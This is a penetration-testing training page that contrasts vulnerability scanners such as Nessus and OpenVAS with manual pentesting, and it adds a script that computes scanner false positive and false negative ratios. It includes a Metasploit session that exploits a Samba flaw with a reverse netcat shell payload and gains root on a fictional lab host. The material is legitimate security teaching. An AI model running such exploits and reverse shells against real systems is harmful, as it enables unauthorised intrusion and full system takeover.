Hacking VI: Vulnerability scanner and penetration testing frameworks

binsec academy GmbH Pentest Training Hacking

It goes without saying that many processes in a penetration test can and should be automated. We can write scripts, for example, that find web applications within a network. A more complex version of the same idea is the vulnerability scanner, which automatically searches an IT system for vulnerabilities. Identifying vulnerabilities is not only the main task of a vulnerability scanner, but also our job as penetration testers. The question, then, is whether a vulnerability scan can be compared to a penetration test and, if not, how the two differ from each other.

Vulnerability scans must be configured and started by a user. After that, the vulnerability scanner searches for weak points automatically. A penetration test, on the other hand, involves manual test phases, which naturally take much longer. Also, vulnerability scanners can only identify known vulnerabilities, because each one must be listed within the software. A pentester, in addition, can search for new, "unknown" vulnerabilities or creatively combine multiple conditions to compromise an IT system. For example, if a web server serves the files written by an FTP server, an attacker only needs FTP access in order to upload a PHP file and have the web server execute its commands.

Another difference between vulnerability scanners and pentesters concerns the exploitation of vulnerabilities. At the request of the client, pentesters will exploit vulnerabilities to figure out how deep an attacker would have been able to penetrate into the target system. A vulnerability scanner, on the other hand, can report false positives, because it does not confirm what it finds. This means that every automatically identified vulnerability must be manually verified.

Thus, a penetration test can include a vulnerability scan, but will actually do much more than that. It should be noted here that tools and, in particular, vulnerability scanners should only be used if their impact on the environment under investigation can be assessed. Otherwise, we are at a loss when a client contacts us about sudden malfunctions in the production system. We should also be aware that we can be hacked ourselves when executing third-party scripts or tools. It is therefore essential to look at the source code - if possible - and to take security precautions such as using isolated systems as a working platform.

There are currently many vulnerability scanners on the market. Two of the best known are Nessus and OpenVAS. Nessus, from Tenable Network Security, is a commercial scanner that runs on Windows, Linux, Unix and Mac OS X. OpenVAS is only available for Linux, but it is free open-source software.

In addition to the current vulnerability scanners on the market, Rapid7 has designed its own penetration testing framework: Metasploit. Metasploit essentially provides a collection of exploits that can be customised to the needs of an attacker or tester with various options. To learn how to use it, Offensive Security designed its own publicly available training course: Metasploit Unleashed (https://www.offensive-security.com/metasploit-unleashed/). The following listing shows an example of how to use Metasploit to automatically exploit a vulnerability in the file server of Dubius Payment Ltd.:

~# msfconsole
msf > use exploit/multi/samba/usermap_script
msf exploit(usermap_script) > set RHOST 10.247.97.48
RHOST => 10.247.97.48
msf exploit(usermap_script) > set RPORT 445
RPORT => 445
msf exploit(usermap_script) > set PAYLOAD cmd/unix/reverse_netcat
PAYLOAD => cmd/unix/reverse_netcat
msf exploit(usermap_script) > set LHOST 10.20.1.14
LHOST => 10.20.1.14
msf exploit(usermap_script) > set LPORT 4444
LPORT => 4444
msf exploit(usermap_script) > exploit
[*] Started reverse TCP handler on 0.0.0.0:4444
[*] Command shell session 1 opened (10.20.1.14:4444 -> 10.247.97.48:54765)
    at Wed Nov 28 13:39.22 +0100 2017

ip addr show
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether d6:15:2f:c4:9a:96 brd ff:ff:ff:ff:ff:ff
    inet 10.247.97.48/24 brd 10.247.97.255 scope global eth0
       valid_lft forever preferred_lft forever
    inet6 fe80::d415:2fff:fec4:9a96/64 scope link
       valid_lft forever preferred_lft forever
hostname
ftp01
id
uid=0(root) gid=0(root) groups=0(root)

Remark: The above scenario does not work in the practice lab.

If we want to compare the validity of vulnerability scans with the validity of penetration tests, we must have a clear understanding of the false negative ratio (FNR): how many vulnerabilities does a vulnerability scanner fail to identify, even though the security gap exists? If you like, you can discover this for yourself by scanning the DMZ network of Dubius Payment with Nessus (7-day trial) or OpenVAS, for example. In your opinion, how many vulnerabilities will a vulnerability scan list? 0, 10, 25 or even more than 50?
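The comparison above, between what a scanner reports and what a pentester verifies by hand, can be done systematically by reconciling the two finding sets. The following script is an added example, not part of the original training page or any binsec tool; both finding lists are constructed sample data (the second host 10.247.97.50 and all finding titles are assumptions), and it computes the false positive share of the scan report alongside the FNR discussed here.

```python
"""Reconcile a vulnerability scan report with manually verified pentest findings.

Added example for this page, not binsec tooling. Both data sets are constructed
sample data; the finding key (host, port, title) is an assumption.
"""
from dataclasses import dataclass


@dataclass(frozen=True)
class Finding:
    host: str
    port: int
    title: str


# Constructed: what an automated scan of a small DMZ might report.
SCANNER_REPORT = {
    Finding("10.247.97.48", 445, "Samba username map script command execution"),
    Finding("10.247.97.48", 21, "Anonymous FTP login allowed"),
    # Banner-based guess; manual check showed the patch was backported.
    Finding("10.247.97.50", 80, "Outdated PHP version (banner)"),
}

# Constructed: findings the pentester actually verified.
VERIFIED_FINDINGS = {
    Finding("10.247.97.48", 445, "Samba username map script command execution"),
    Finding("10.247.97.48", 21, "Anonymous FTP login allowed"),
    # Found only by hand: the web root is the FTP upload directory, so an
    # uploaded PHP file is executed. A chained condition no scanner lists.
    Finding("10.247.97.50", 80, "PHP execution of FTP-uploaded files"),
}


def reconcile(scanner: set, verified: set) -> dict:
    """Return TP/FP/FN sets plus false positive and false negative ratios.

    fpr = FP / reported (share of scan findings rejected on manual check);
    fnr = FN / verified (share of real vulnerabilities the scanner missed).
    """
    tp = scanner & verified
    fp = scanner - verified
    fn = verified - scanner
    return {
        "tp": tp, "fp": fp, "fn": fn,
        "fpr": len(fp) / len(scanner) if scanner else 0.0,
        "fnr": len(fn) / len(verified) if verified else 0.0,
    }


if __name__ == "__main__":
    r = reconcile(SCANNER_REPORT, VERIFIED_FINDINGS)
    print(f"TP={len(r['tp'])} FP={len(r['fp'])} FN={len(r['fn'])} "
          f"FPR={r['fpr']:.2f} FNR={r['fnr']:.2f}")
    for f in sorted(r["fn"], key=lambda x: (x.host, x.port)):
        print("missed by scanner:", f)
```

Feeding a real scan export and the pentest report into the two sets gives the same numbers for an actual engagement.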
